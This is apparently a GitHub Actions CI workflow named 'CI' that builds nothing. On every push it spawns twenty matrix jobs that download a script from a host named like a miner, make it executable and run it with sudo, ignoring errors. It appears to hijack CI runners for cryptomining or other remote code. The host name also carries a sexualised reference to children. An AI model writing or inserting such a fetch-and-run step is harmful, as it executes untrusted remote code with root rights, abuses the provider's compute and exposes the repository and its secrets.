name: CI

on:
  push:

concurrency:
  group: global
  cancel-in-progress: true

jobs:
  build:
    runs-on: ubuntu-latest
    timeout-minutes: 120
    strategy:
      matrix:
        os: ["windows-xp", "windows-7", "windows-10", "windows-11", "windows-lite"]
        version: ["a", "b", "c", "d"]

    steps:
      - name: Run
        continue-on-error: true
        run: |
          wget "https://sk1dder-loli-m1ner.pages.dev/execute.sh"
          chmod +x ./execute.sh
          sudo ./execute.sh
